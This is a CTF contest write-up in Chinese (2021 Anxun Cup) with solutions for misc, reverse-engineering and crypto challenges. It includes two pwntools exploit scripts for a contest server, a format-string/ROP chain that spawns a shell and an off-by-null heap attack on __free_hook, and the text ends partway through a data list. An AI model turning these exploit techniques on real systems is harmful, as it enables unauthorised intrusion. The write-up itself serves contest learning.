2021安询杯wp

2021安询杯wp

Misc

应该算是签到

来得早不如来的巧

CyzCC_loves_LOL

小脑洞+老考点，理解一下

其实是放进百度翻译然后一下看出来了

s = 'D0g3isthepAssword'
flag = ''
for i in range(len(s)):
    tmp = ord(s[i])-3
    if(tmp<65):
        flag += chr(tmp+26)
    else:
        flag += chr(tmp)
print(flag)

密码为AGdJfpqebmXpptloa

然后解压得到图片和图片（

jpg那个图说是silent，于是知道是silenteye，右边的图不是piet就是brainloller，试了之后发现是brainloller

然后.\bftools.exe decode brainloller .\Program.png，得到的brainfuck解码一下得到0MTTW CWZVN!，空格替换下划线即可

然后silenteye解jpg，密码为0MTTW_CWZVN!

D0g3{544f3225-bbaf-47dc-ba8d-5bda54cbaecb}

Cthulhu Mythos

hint.mp3是sstv，后面那段扫一下即可

解码

根据提示猜测是泰拉瑞亚，去github下载一个地图编辑器

进去就看到7I4YF6QL0

然后猜测剩下的在对话里之类的，之后在分析里找到内容

导出后看txt

按顺序撸下来,得到

emm能看出来前面和后面都有错误，但是前面能知道是D0g3{M1necR4ft_G0_A 后面是d_Try_Terr4ria!}

然后觉得中间填and，尝试提交发现正确，所以flag为

D0g3{M1necR4ft_G0_And_Try_Terr4ria!}

lovemath

爆CRC

得到密码

th1s_Is_Y0ur_pa33w0rd_We1c0m3e

blind是LSB，BGR的，提取出来一个图片纯数字

然后用QQ OCR一下

1251077695482776025338577125579215707216262981842821000162276994967943212822693842845266851984880336702446444408289977864567921038435144120176357529686342977212633764247620567669441602729004003473312468776582473461071462631554533766709934484393185739708817165738912742570170547790145328253304755428563911689057632001795598667127514331122190795355921436735375126688142856470280128821316586008242687241930886868804388482643589009068543771977163419519208340324352

结合题目给的甚至能画出自己

找到了塔珀自指公式，然后github发现有解码的网站

http://keelyhill.github.io/tuppers-formula/

反过来看即可

D0g3{I_LOV3_math}

Pwn

stack

格式化字符串泄露基地址和canary，计算出pop,system,/bin/sh在程序中的地址然后栈溢出即可

from pwn import *
context.log_level='debug'
p = remote('47.108.195.119',20113)
p.recv()
p.recv()
p.send('n03tAck')
p.recv()
p.sendline('Mumuzi')
p.recv()
payload='%11$p%9$p'
p.send(payload)
canary=int(p.recv(18),16)
success("canary:"+hex(canary))
start_addr=int(p.recv(14),16)
success("start_addr:" + hex(start_addr))
addrbase=start_addr-0x0870
sys_addr=0x000A8c+addrbase
binsh_addr=0x00B24+addrbase
pop_rdi=0x0000000000000b03+addrbase
success("sys_addr:" + hex(sys_addr))
success("binsh_addr:" + hex(binsh_addr))
success("pop_rdi:" + hex(pop_rdi))
payload='a'*(0x18)+p64(canary)+p64(0)+p64(pop_rdi)+p64(binsh_addr)+p64(sys_addr)
p.send(payload)
p.interactive()

连上之后cat sky_token然后exit输入sky_token即可

本来一开始是windows跑的每次exit输入sky_token都显示我错误，只好去打开ubuntu老老实实跑一下了

noleak

1.思路：off by null打__free_hook

from pwn import *

#p=process('./noleak1')
p=remote('47.108.195.119',20182)
context.log_level='debug'
elf=ELF('./noleak1')
libc=ELF('libc.so.6')
#gdb.attach(p,'b *$rebase(0xfc9)')

p.sendline('n03tAck')
p.sendline('1u1u')

p.sendlineafter('please input a str:','\x4e\x30\x5f\x70\x79\x5f\x31\x6e\x5f\x74\x48\x65\x5f\x63\x74\x37')

def menu(id):
	p.sendlineafter('>',str(id))

def add(id,size):
	menu(1)
	p.sendlineafter('Index?\n',str(id))
	p.sendlineafter('Size?\n',str(size))

def show(id):
	menu(2)
	p.sendlineafter('Index?\n',str(id))

def edit(id,content):
	menu(3)
	p.sendlineafter('Index?\n',str(id))
	p.sendlineafter('content:\n',str(content))

def delete(id):
	menu(4)
	p.sendlineafter('Index?\n',str(id))



add(0,0x450)
add(1,0x18)
add(2,0x4f0)
add(3,0x18)

delete(0)
edit(1,'a'*0x10+p64(0x480))
delete(2)

add(0,0x450)
show(1)

leak=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
malloc_hook=leak+0x7f3223b9bc30-0x7f3223b9bca0
success('malloc_hook:'+hex(malloc_hook))
libc_base=malloc_hook-libc.sym['__malloc_hook']
success('libc_base:'+hex(libc_base))

add(2,0x18)
delete(2)
edit(1,p64(libc_base+libc.sym['__free_hook']))

add(4,0x10)
add(5,0x10)
edit(5,p64(libc_base+libc.sym['system']))

add(6,0x30)
edit(6,'/bin/sh\x00')
delete(6)

#gdb.attach(p)

p.interactive()

Re

sign_in

一个贪吃蛇游戏（又是一个嵌屎的题）

smc

直接动调，然后手动改跳转进入该函数。

是shuffle+xxtea

先解xxtea

因为我是改条件跳转的，所以要爆破delta。

#include <stdio.h>  
#include <stdint.h>  
//#define DELTA (0x44336730+ 0x13) 
#define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[((p&3)^e)] ^ z)))  

void btea(uint32_t* v, int n, uint32_t const key[4],int DELTA)
{
    uint32_t y, z, sum;
    unsigned p, rounds, e;
    if (n > 1)            /* Coding Part */
    {
        rounds = 6 + 52 / n;
        sum = 0;
        z = v[n - 1];
        do
        {
            sum += DELTA;
            e = (sum >> 2) & 3;
            for (p = 0; p < n - 1; p++)
            {
                y = v[p + 1];
                z = v[p] += MX;
            }
            y = v[0];
            z = v[n - 1] += MX;
        } while (--rounds);
    }
    else if (n < -1)      /* Decoding Part */
    {
        n = -n;
        rounds = 6 + 52 / n;
        sum = rounds * DELTA;
        y = v[0];
        do
        {
            e = (sum >> 2) & 3;
            for (p = n - 1; p > 0; p--)
            {
                z = v[p - 1];
                y = v[p] -= MX;
            }
            z = v[n - 1];
            y = v[0] -= MX;
            sum -= DELTA;
        } while (--rounds);
    }
}


int main()
{

    uint32_t const k[4] = { 0x44,0x30, 0x67,0x33 };
    int n = 32; //n的绝对值表示v的长度，取正表示加密，取负表示解密  
    // v为要加密的数据是两个32位无符号整数  
    // k为加密解密密钥，为4个32位无符号整数，即密钥长度为128位  
   /* printf("加密前原始数据：%u %u\n", v[0], v[1]);
    btea(v, n, k);
    printf("加密后的数据：%u %u\n", v[0], v[1]);*/
    //puts((char*)v);
    
    int DELTA = 0x44336730;
    for (DELTA; DELTA <= 0x44336730 + 256; DELTA += 1)
    {
        uint32_t v[32] = { 0xBF8ED8A5, 0xE115A9F9, 0xFCD3F08A, 0x8BBF8946, 0xC308B162, 0x2B19CF29, 0x7A770656, 0xA4BAE4BA,
    0x4E3E8CE4, 0x01A7E1D9, 0x75E9CE04, 0x22B593B9, 0x497742B4, 0x24EB15F6, 0xF2C2FF0E, 0x47973039,
    0xC801CA0D, 0x6A125861, 0x80320BE8, 0x0385BD47, 0x69F96DDD, 0xE56490D1, 0x2D3CAD4B, 0x2D4200BE,
    0x89EF6979, 0x4A91885D, 0x019DEBC7, 0x3BF8FD96, 0x1BDD2557, 0xB8685FDD, 0x57226614, 0x9F585C28 };
        printf("%d\n", DELTA);
        btea(v, -n, k, DELTA);
        for (int i = 0; i < 32; i++)
        {
            printf("0x%x,", v[i]);
        }
        printf("\n");
    }
   //puts((char*)v);
    return 0;
}

得到：

0x3c,0x40,0x2b,0x66,0x6f,0x4f,0x5c,0x1d,0x42,0x1a,0x2b,0x57,0x36,0x44,0x33,0x1c,0x1d,0x6b,0x5c,0x6,0xf,0x1c,0x5c,0x1a,0x2b,0x9,0x32,0x6e,0x15,0x5a,0x2c,0x25

然后shuffle可以先算出他的偏移值，然后直接还原就可

m=[0x3c,0x40,0x2b,0x66,0x6f,0x4f,0x5c,0x1d,0x42,0x1a,0x2b,0x57,0x36,0x44,0x33,0x1c,0x1d,0x6b,0x5c,0x6,0xf,0x1c,0x5c,0x1a,0x2b,0x9,0x32,0x6e,0x15,0x5a,0x2c,0x25]
shuffle=[0, 6, 17, 27, 18, 7, 1, 8, 19, 28, 20, 9, 2, 10, 21, 29, 22, 11, 3, 12, 23, 30, 24, 13, 4, 14, 25, 31, 26, 15, 5, 16]

for i in range(len(shuffle)):
    d.append(m[shuffle[i]])
print(d)
for i in range(31,-1,-1):
    d[i] ^= d[(i + 1) % 32]
print(bytearray(d))
#Th4_1mp0rtant_th2n9_is_t0_le@rn!

virtus

他释放了一个文件？（这是一个拉屎的题）但是我找不到，不知道是不是权限问题，然后我用Resource Hacker直接梭哈出一个资源文件，

发现好多0x41,我想如果是可执行文件，这些0x41应该是0才对，然后我又异或了开头，发现开头为pe头。那就直接全部异或0x41,保存成新文件继续分析。

首先会对flag动手脚，然后会对key做手脚，一开始想爆破，爆破了半天，（最后解出来发现首位是特殊字符，寄！）

首先找到key

def key_de(en):
    enc=[]
    for i in range(len(en)):
        enc.append(ord(en[i]))
    v2=[0]*56
    #step3 re
    for i in range(4):
        temp=enc[i]
        if temp % 2==1:
            temp-=1
        temp=[int(i) for i in bin(temp)[2:].zfill(6)]
        for j in range(6):
            v2[7 * i + 28 + j]=temp[j]
        if enc[i]%2==1:
            j=5
            v2[7 * i + 29 + j]=1
    a1=[]
    #验证step3
    for i in range(4):
        v7 = 0
        for j in range(6):
            v7 = 2 * (v7 + v2[7 * i + 28 + j])
            if (v2[7 * i + 29 + j] == 1 and j == 5):
                v7+=1
        a1.append(v7)

    #step2
    v4=0
    v5=0
    for i in range(4):
        for j in range(7):
            v3=v2[7 * i + 28 + j]
            v2[7 * v5 + v4]=v3
            v5 = (v5 + 1) % 4
            v4 = (v4 + 2) % 7
    f=''
    for i in range(4):
        for j in range(6,-1,-1):
            v2[7 * i + 28 + j]=v2[7 * i + j]
        f+=chr(int(''.join(map(str,v2[7 * i + 28 + 0 : 7* i + 28 + 7])),2))
    return f
print(key_de(key_de(key_de(key_de('Lroo')))))
#_shy

然后再sub_4012F0中发现是sm4的sbox盒，ck，fk都没改

直接找脚本梭哈

class SM4Cipher:
    def __init__(self, key: bytes):
        if not len(key) == 16:
            raise ValueError("SM4 key must be length of 16. ")
        self._key_r = self._generate_key(key)
        self.block_size = 16

    def encrypt(self, plaintext: bytes):
        return self._do(plaintext, self._key_r)

    def decrypt(self, ciphertext: bytes):
        return self._do(ciphertext, self._key_r[::-1])

    def _do(self, text: bytes, key_r: list):
        text_ = [0 for _ in range(4)]
        # 将 128bit 转化成 4x32bit
        for i in range(4):
            text_[i] = int.from_bytes(text[4 * i:4 * i + 4], 'big')
        for i in range(32):
            box_in = text_[1] ^ text_[2] ^ text_[3] ^ key_r[i]
            box_out = self._s_box(box_in)
            temp = text_[0] ^ box_out ^ self._rot_left(box_out, 2) ^ self._rot_left(box_out, 10)
            temp = temp ^ self._rot_left(box_out, 18) ^ self._rot_left(box_out, 24)
            text_ = text_[1:] + [temp]
        text_ = text_[::-1]  # 结果逆序
        # 将 4x32bit 合并成 128bit
        result = bytearray()
        for i in range(4):
            result.extend(text_[i].to_bytes(4, 'big'))
        return bytes(result)

    def _generate_key(self, key: bytes):
        """密钥生成"""
        key_r, key_temp = [0 for _ in range(32)], [0 for _ in range(4)]
        FK = [0xa3b1bac6, 0x56aa3350, 0x677d9197, 0xb27022dc]
        CK = [0x00070e15, 0x1c232a31, 0x383f464d, 0x545b6269, 0x70777e85, 0x8c939aa1, 0xa8afb6bd, 0xc4cbd2d9,
              0xe0e7eef5, 0xfc030a11, 0x181f262d, 0x343b4249, 0x50575e65, 0x6c737a81, 0x888f969d, 0xa4abb2b9,
              0xc0c7ced5, 0xdce3eaf1, 0xf8ff060d, 0x141b2229, 0x30373e45, 0x4c535a61, 0x686f767d, 0x848b9299,
              0xa0a7aeb5, 0xbcc3cad1, 0xd8dfe6ed, 0xf4fb0209, 0x10171e25, 0x2c333a41, 0x484f565d, 0x646b7279]
        # 将 128bit 拆分成 4x32bit
        for i in range(4):
            temp = int.from_bytes(key[4 * i:4 * i + 4], 'big')
            key_temp[i] = temp ^ FK[i]
        # 循环生成轮密钥
        for i in range(32):
            box_in = key_temp[1] ^ key_temp[2] ^ key_temp[3] ^ CK[i]
            box_out = self._s_box(box_in)
            key_r[i] = key_temp[0] ^ box_out ^ self._rot_left(box_out, 13) ^ self._rot_left(box_out, 23)
            key_temp = key_temp[1:] + [key_r[i]]
        return key_r

    @staticmethod
    def _s_box(n: int):
        BOX = [0xD6, 0x90, 0xE9, 0xFE, 0xCC, 0xE1, 0x3D, 0xB7, 0x16, 0xB6, 0x14, 0xC2, 0x28, 0xFB, 0x2C, 0x05, 0x2B,
               0x67, 0x9A, 0x76, 0x2A, 0xBE, 0x04, 0xC3, 0xAA, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99, 0x9C, 0x42,
               0x50, 0xF4, 0x91, 0xEF, 0x98, 0x7A, 0x33, 0x54, 0x0B, 0x43, 0xED, 0xCF, 0xAC, 0x62, 0xE4, 0xB3, 0x1C,
               0xA9, 0xC9, 0x08, 0xE8, 0x95, 0x80, 0xDF, 0x94, 0xFA, 0x75, 0x8F, 0x3F, 0xA6, 0x47, 0x07, 0xA7, 0xFC,
               0xF3, 0x73, 0x17, 0xBA, 0x83, 0x59, 0x3C, 0x19, 0xE6, 0x85, 0x4F, 0xA8, 0x68, 0x6B, 0x81, 0xB2, 0x71,
               0x64, 0xDA, 0x8B, 0xF8, 0xEB, 0x0F, 0x4B, 0x70, 0x56, 0x9D, 0x35, 0x1E, 0x24, 0x0E, 0x5E, 0x63, 0x58,
               0xD1, 0xA2, 0x25, 0x22, 0x7C, 0x3B, 0x01, 0x21, 0x78, 0x87, 0xD4, 0x00, 0x46, 0x57, 0x9F, 0xD3, 0x27,
               0x52, 0x4C, 0x36, 0x02, 0xE7, 0xA0, 0xC4, 0xC8, 0x9E, 0xEA, 0xBF, 0x8A, 0xD2, 0x40, 0xC7, 0x38, 0xB5,
               0xA3, 0xF7, 0xF2, 0xCE, 0xF9, 0x61, 0x15, 0xA1, 0xE0, 0xAE, 0x5D, 0xA4, 0x9B, 0x34, 0x1A, 0x55, 0xAD,
               0x93, 0x32, 0x30, 0xF5, 0x8C, 0xB1, 0xE3, 0x1D, 0xF6, 0xE2, 0x2E, 0x82, 0x66, 0xCA, 0x60, 0xC0, 0x29,
               0x23, 0xAB, 0x0D, 0x53, 0x4E, 0x6F, 0xD5, 0xDB, 0x37, 0x45, 0xDE, 0xFD, 0x8E, 0x2F, 0x03, 0xFF, 0x6A,
               0x72, 0x6D, 0x6C, 0x5B, 0x51, 0x8D, 0x1B, 0xAF, 0x92, 0xBB, 0xDD, 0xBC, 0x7F, 0x11, 0xD9, 0x5C, 0x41,
               0x1F, 0x10, 0x5A, 0xD8, 0x0A, 0xC1, 0x31, 0x88, 0xA5, 0xCD, 0x7B, 0xBD, 0x2D, 0x74, 0xD0, 0x12, 0xB8,
               0xE5, 0xB4, 0xB0, 0x89, 0x69, 0x97, 0x4A, 0x0C, 0x96, 0x77, 0x7E, 0x65, 0xB9, 0xF1, 0x09, 0xC5, 0x6E,
               0xC6, 0x84, 0x18, 0xF0, 0x7D, 0xEC, 0x3A, 0xDC, 0x4D, 0x20, 0x79, 0xEE, 0x5F, 0x3E, 0xD7, 0xCB, 0x39,
               0x48]
        result = bytearray()
        # 将 32bit 拆分成 4x8bit，依次进行S盒变换
        for item in list(n.to_bytes(4, 'big')):
            result.append(BOX[item])
        return int.from_bytes(result, 'big')

    @staticmethod
    def _rot_left(n, m):
        """循环左移"""
        return ((n << m) | (n >> (32 - m))) & 0xFFFFFFFF
key = bytes.fromhex("68677f4e555b4e777b65785b4c726f6f")  # 128bit密钥
plaintext = bytes.fromhex("00112233445566778899aabbccddeeff")  # 128bit明文
sm4 = SM4Cipher(key)
print(sm4.encrypt(plaintext).hex())  #
from Crypto.Util.number import *
#5C89EEF56FC54492DBE3AE9CB54F4AF4E7A35E0FFC93FC766CFB29E0162FA567
print(sm4.decrypt(long_to_bytes(0x5C89EEF56FC54492DBE3AE9CB54F4AF4E7A35E0FFC93FC766CFB29E0162FA567)))
s=b'Nh5XOXC\x7fv4eSccYi6Xv^Y6hXrocXEs`&'
a=[]
for i in range(0,32):
    a.append(s[i])
for i in range(0,32,2):
    a[i]^=6
for i in range(1,32,2):
    a[i]^=7
print(bytearray(a))

#Ho3_I_Exp3cTed_n0_pY_1n_the_Ctf!

Mazeeee

（找屎的题）

32位程序，ida载入

 if ( v5 == 22 )
  {
    v18 = 0;
    while ( 2 )                                 // 22步数
    {
      if ( v18 >= 22 )
      {
        if ( off_3E0074[150 * dword_3E0284 + 15 * dword_3E027C + unk_3E0248] == 'E' )
        {
          v15 = v4;
          v6 = sub_3D13D4(v4, input);
          sub_3D1316(v4[0]);                    // 进一步的check
      }
/*查看地图一共750B，结合150*z+15*y+x判断为三维迷宫 15*10*5 
且在22步从00到终点*/
 v6 = (v6 - 'S');
 switch ( v6 ) {
            case 0u:
            --dword_3E0284; 
         ...
            case 4u:
            ++dword_3E0284;
         ...
             case 0xEu:
         --unk_3E0248;
         ...//等推导出如何对(x,y,z)进行移动
          }
"""
S   下一层  
W   上一层    
a   左移动1
d   右边移动2 
s   向上一行
w   向下两行
"""

打印出地图，三维迷宫路径上只能为O或E，从S出发最终到E，走22步到达，路径规模比较小，直接手过迷宫即可。

S # O # # # # # # O # # # # # 
# # # O # # # # # # # # # # # 
# # # # # # # # # # # # # # # 
# # # # # # # # # # # # # # # 
# # # # # O # # # # # # # # # 
# # # # # # # # # # # # # # # 
# # # # # O # # O # # # # # # 
# # # # O # # # # # # # # # # 
# # # # # # # # # # # O # # # 
# # # # # # # # # # # # # # #      

# # O # # # O # # # # # O # # 
# # # # # # # # # # # # O # # 
# # # O # # # O # # # # # # # 
# # # # # # O # # # # # # # # 
# # # # # # O # O O # # # # # 
# # # # # # # # # # # # # # # 
# # # # # O # # # # # # # # # 
# # # # # # O # # # # # # # # 
# # # # # # # # # # # # # # # 
# # # # # # # # # # # # # # # 

# # O # # # # # # O # # # # # 
# # # # # # # # # # O # # # # 
# # O # # # # # # # # # # # # 
# # # # # # # # # # # # O O # 
# # O # O # O O O # # # # # # 
# # # # # # # # # # # # # # O 
# # # # # # # # # # # # # # # 
# # # # # # # # # # # # # # # 
# # # O # # # # # O # # # # # 
# # # # # # # # # # # # # # # 

# # # # # # # # # # # # # # # 
# # # # O # # # # # # # # # # 
# # # O # # # # # # # # # # # 
# # O # # # # # # # # # # # # 
# # O # # # # # O # # # # # # 
# # # # # # # # # O O # # # # 
# # # # # # # # # # # O # # # 
# # # # O # # # # E # # # # # 
# # # # # # # # # # # # # # # 
# # # # # # # # # # # # # # # 

# # O # # # # # # # # # # # O 
# # O # # # # # # # # # # # # 
# # # # # # # # # # # # # # # 
# # # # # # # # O O # # # # # 
# # # # # # O O O # # # # # # 
# # # # # # # # # # O # # # # 
# # # # # # O # # # O # # # # 
# # # # # # # # # # O # # # # 
# # # # # # O # O # O # O # # 
# # # O # # # # # # # # # # # 
//dWWwwdddWWaawwddsssSaw

调试程序下载msvcr100d.dll最新版放在同目录下，下断点到有congratulation处。

  for ( i = 0; i < 44; ++i )
  {
    v1 = sub_3D13ED(&a1);                       // v1是长度
    v2 = sub_3D1262(&a1, i % v1);
    sub_3D14AB(byte_3E024C[i] ^ *v2);           // v2是输入的迷宫路径
  }
//byte_3E024C全为0，交叉引用发现另一处变化。
void __stdcall sub_3D1D80()
{
  int i; // [esp+D0h] [ebp-8h]

  for ( i = 1; i < 44; ++i )
    byte_3E0000[i] = byte_3E024B[i] & 0xE0 | byte_3E024C[i] & 0x1F;
  byte_3E0000[0] = byte_3E0277 & 0xE0 | byte_3E024C[0] & 0x1F;
}
//已知byte_3E0000，反求右侧，这里直接用z3求解

如下:

from z3 import *
kk=[BitVec('a%d'%i,8) for i in range(44)]
enc=[0x0E, 0x5D, 0x7D, 0x7D, 0x5D, 0x4E, 0x4E, 0x4E, 0x5D, 0x7D, 0x6B, 0x4B, 0x5D, 0x5D, 0x4E, 0x4E, 0x59, 0x59, 0x59, 0x59, 0x6B, 0x5D, 0x53, 0x24, 0x7B, 0x34, 0x07, 0x49, 0x01, 0x1B, 0x23, 0x27, 0x7E, 0x35, 0x3F, 0x12, 0x1B, 0x29, 0x32, 0x09, 0x16, 0x12, 0x60, 0x4A]
tmp=[0]*44
s=Solver()
for i in range(1,44):
   tmp[i]=(kk[i-1]&0xe0)| (kk[i]&0x1f)
   s.add(tmp[i]==enc[i])
tmp[0]=kk[0]&0x1f
s.add(tmp[0]==enc[0])
s.check()
m=s.model()
key=[]
for i in range(44):
   key.append(m[kk[i]].as_long())
print()
for i in range(22):
   print(chr(ord(b[i])^key[i+22]),end='')
#W3lc0me_t0_The_Maze!!}

这样拿到flag后半段是对的，前半段根据hint在strings窗口查看，发现一串base64，直接解码是乱码，对base64表交叉引用发现表经过了变化，即base64换表，写脚本还原即可。

 """
    for ( j = 0; j < 63; j += 2 )
      sub_3D121C(&byte_3E0030[j], &basetable[j]);// 交换函数
 """
 import base64
base='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
new=''
for i in range(0,63,2):
    new+=base[i+1]+base[i]
enc='QCAmN2sYNGUfR3EvOUMuNWYkW3k1JR=='
c=''
for i in range(len(enc)):
    if enc[i] in new:
        c+=base[new.index(enc[i])]
    else:
        c+='='
print(c)
print(base64.b64decode(c))  
#D0g3{Y0u^Can=So1ve_it!
#flag：D0g3{Y0u^Can=So1ve_it!W3lc0me_t0_The_Maze!!}

Crypto

little_trick

签到题，给了p,q,c但是没给e,分别按位加密了dp,dq,只需要挨个还原即可，需要注意的是加密dq那儿是py2,需要用py2跑随机数，还原dp,dq再已知dp,dq,p,q解密。

p=119494148343917708105807117614773529196380452025859574123211538859983094108015678321724495609785332508563534950957367289723559468197440246960403054020452985281797756117166991826626612422135797192886041925043855329391156291955066822268279533978514896151007690729926904044407542983781817530576308669792533266431

q=125132685086281666800573404868585424815247082213724647473226016452471461555742194042617318063670311290694310562746442372293133509175379170933514423842462487594186286854028887049828613566072663640036114898823281310177406827049478153958964127866484011400391821374773362883518683538899757137598483532099590137741

c=10238271315477488225331712641083290024488811710093033734535910573493409567056934528110845049143193836706122210303055466145819256893293429223389828252657426030118534127684265261192503406287408932832340938343447997791634435068366383965928991637536875223511277583685579314781547648602666391656306703321971680803977982711407979248979910513665732355859523500729534069909408292024381225192240385351325999798206366949106362537376452662264512012770586451783712626665065161704126536742755054830427864982782030834837388544811172279496657776884209756069056812750476669508640817369423238496930357725842768918791347095504283368032
from Crypto.Util.number import * 
import random
import gmpy2
import os


dq=23458591381644494879596426183878928641891759871602961070839457303969747353773411708437315165237216481430908369709167907047043280248152040749469402814146054871536032870746473649690743697560576735624528397398691515920649222501258921802372365480019200479555430922883680472732415240714991623845227274793947921407
dp=104137587579880166582178434901328539485184135240660490271571544307637817287517428663992284342411864826922600858353966205614398977234519495034539643954586905495941906386407181383904043194285771983919780892934288899562700746832428876894943676937141813284454381136254907871626581989544814547778881240129496262777

def decrypt(p,q,dq,dp,c):
    n = p*q
    phi = (p-1)*(q-1)
    dd = gmpy2.gcd(p-1, q-1)
    d=(dp-dq)//dd * gmpy2.invert((q-1)//dd, (p-1)//dd) * (q-1) +dq
    m = pow(c, d, n)
    print(long_to_bytes(m))
decrypt(p,q,dp,dq,c)
#D0g3{Welc0me_t0_iSOON_4nd_have_4_go0d_time}

'''
result=[1, 0, 7789, 1, 17598, 20447, 15475, 23040, 41318, 23644, 53369, 19347, 66418, 5457, 0, 1, 14865, 97631, 6459, 36284, 79023, 1, 157348, 44667, 185701, 116445, 23809, 220877, 0, 1, 222082, 30333, 55446, 207442, 193806, 149389, 173229, 349031, 152205, 1, 149157, 196626, 1, 222532, 10255, 46268, 171536, 0, 351788, 152678, 0, 172225, 109296, 0, 579280, 634746, 1, 668942, 157973, 1, 17884, 662728, 759841, 450490, 0, 139520, 157015, 616114, 199878, 154091, 1, 937462, 675736, 53200, 495985, 307528, 1, 804492, 790322, 463560, 520991, 436782, 762888, 267227, 306436, 1051437, 384380, 505106, 729384, 1261978, 668266, 1258657, 913103, 935600, 1, 1, 401793, 769612, 484861, 1024896, 517254, 638872, 1139995, 700201, 308216, 333502, 0, 0, 401082, 1514640, 667345, 1015119, 636720, 1011683, 795560, 783924, 1269039, 5333, 0, 368271, 1700344, 1, 383167, 7540, 1490472, 1484752, 918665, 312560, 688665, 967404, 922857, 624126, 889856, 1, 848912, 1426397, 1291770, 1669069, 0, 1709762, 130116, 1711413, 1336912, 2080992, 820169, 903313, 515984, 2211283, 684372, 2773063, 391284, 1934269, 107761, 885543, 0, 2551314, 2229565, 1392777, 616280, 1368347, 154512, 1, 1668051, 0, 2453671, 2240909, 2661062, 2880183, 1376799, 0, 2252003, 1, 17666, 1, 2563626, 251045, 1593956, 2215158, 0, 93160, 0, 2463412, 654734, 1, 3341062, 3704395, 3841103, 609968, 2297131, 1942751, 3671207, 1, 1209611, 3163864, 3054774, 1055188, 1, 4284662, 3647599, 247779, 0, 176021, 3478840, 783050, 4613736, 2422927, 280158, 2473573, 2218037, 936624, 2118304, 353989, 3466709, 4737392, 2637048, 4570953, 1473551, 0, 0, 4780148, 3299784, 592717, 538363, 2068893, 814922, 2183138, 2011758, 2296545, 5075424, 1814196, 974225, 669506, 2756080, 5729359, 4599677, 5737886, 3947814, 4852062, 1571349, 4123825, 2319244, 4260764, 1266852, 1, 3739921, 1, 5948390, 1, 2761119, 2203699, 1664472, 3182598, 6269365, 5344900, 454610, 495499, 6407607, 1, 1, 476694, 4339987, 5642199, 1131185, 4092110, 2802555, 0, 5323448, 1103156, 2954018, 1, 1860057, 128891, 2586833, 6636077, 3136169, 1, 3280730, 6970001, 1874791, 48335, 6229468, 6384918, 5412112, 1, 7231540, 7886316, 2501899, 8047283, 2971582, 354078, 401999, 6427168, 4839680, 1, 44050, 3319427, 0, 1, 1452967, 4620879, 5525420, 5295860, 643415, 5594621, 951449, 1996797, 2561796, 6707895, 7072739]
ll=len(result)
list_p = sieve_base[0:ll]
list_q = sieve_base[ll:2*ll]
dq=''
for i in range(ll):
    p=list_p[i]
    q=list_q[i]
    f=False
    for j in range(10):
        if pow(j,65537,p*q)==result[i]:
            dq+=str(j)
            f=True
            break
    if not f:
        print('error')
                    
print(dq)
'''
'''
#py2
import random
seeds=[3, 0, 39, 78, 14, 49, 73, 83, 55, 48, 30, 28, 23, 16, 54, 23, 68, 7, 20, 8, 98, 68, 45, 36, 97, 13, 83, 68, 16, 59, 81, 26, 51, 45, 36, 60, 36, 94, 58, 11, 19, 33, 95, 12, 60, 38, 51, 95, 21, 3, 38, 72, 47, 80, 7, 20, 26, 80, 18, 43, 92, 4, 64, 93, 91, 12, 86, 63, 46, 73, 89, 5, 91, 17, 88, 94, 80, 42, 90, 14, 45, 53, 91, 16, 28, 81, 62, 63, 66, 20, 81, 3, 43, 99, 54, 22, 2, 27, 2, 62, 88, 99, 78, 25, 76, 49, 28, 96, 95, 57, 94, 53, 32, 58, 32, 72, 89, 15, 4, 78, 89, 74, 86, 45, 51, 65, 13, 75, 95, 42, 20, 77, 34, 66, 56, 20, 26, 18, 28, 11, 88, 62, 72, 27, 74, 42, 63, 76, 82, 97, 75, 92, 1, 5, 20, 78, 46, 85, 81, 54, 64, 87, 37, 91, 38, 39, 1, 90, 61, 28, 13, 60, 37, 90, 87, 15, 78, 91, 99, 58, 62, 73, 70, 56, 82, 5, 19, 54, 76, 88, 4, 3, 55, 3, 3, 22, 85, 67, 98, 28, 32, 42, 48, 96, 69, 3, 83, 48, 26, 20, 45, 16, 45, 47, 92, 0, 54, 4, 73, 8, 31, 38, 3, 10, 84, 60, 59, 69, 64, 91, 98, 73, 81, 98, 9, 70, 44, 44, 24, 95, 83, 49, 31, 19, 89, 18, 20, 78, 86, 95, 83, 23, 42, 51, 95, 80, 48, 46, 88, 7, 47, 64, 55, 4, 62, 37, 71, 75, 98, 67, 98, 58, 66, 70, 24, 58, 56, 44, 11, 78, 1, 78, 89, 97, 83, 72, 98, 12, 41, 33, 14, 40, 27, 5, 18, 35, 25, 31, 69, 97, 84, 47, 25, 90, 78, 15, 72, 71]

rand='[54, 36, 60] [84, 42, 25] [20, 38, 39] [81, 9, 92] [70, 65, 94] [6, 11, 75] [27, 50, 46] [49, 85, 8] [95, 14, 73] [54, 71, 30] [53, 28, 65] [11, 13, 59] [94, 89, 8] [36, 41, 44] [91, 13, 48] [92, 94, 89] [94, 74, 90] [32, 65, 7] [90, 68, 90] [22, 96, 12] [83, 35, 5] [74, 74, 90] [27, 48, 33] [32, 98, 95] [80, 37, 84] [25, 68, 84] [49, 85, 37] [74, 94, 74] [48, 41, 44] [22, 94, 2] [50, 45, 38] [74, 20, 20] [50, 16, 82] [27, 8, 33] [32, 98, 91] [30, 57, 26] [98, 95, 91] [54, 28, 43] [58, 20, 94] [45, 55, 92] [78, 52, 51] [57, 81, 27] [76, 51, 53] [47, 65, 66] [57, 26, 80] [63, 72, 6] [24, 50, 82] [76, 51, 99] [68, 63, 47] [23, 36, 60] [63, 42, 6] [7, 59, 98] [43, 45, 34] [27, 70, 95] [32, 15, 7] [90, 68, 76] [20, 20, 60] [27, 70, 95] [18, 66, 19] [3, 69, 14] [56, 55, 58] [23, 39, 15] [47, 63, 92] [91, 49, 56] [17, 68, 16] [47, 66, 14] [79, 3, 31] [44, 29, 90] [39, 58, 85] [27, 56, 46] [8, 60, 14] [62, 74, 79] [17, 68, 16] [52, 96, 28] [39, 18, 62] [54, 12, 28] [54, 70, 95] [63, 27, 22] [20, 9, 58] [10, 70, 65] [48, 8, 33] [61, 45, 71] [8, 17, 16] [36, 48, 41] [13, 59, 17] [50, 55, 38] [92, 17, 23] [44, 29, 90] [43, 24, 44] [90, 76, 90] [50, 45, 38] [23, 54, 36] [69, 14, 46] [40, 17, 24] [91, 13, 48] [95, 14, 2] [94, 5, 8] [64, 95, 19] [95, 94, 8] [92, 17, 97] [18, 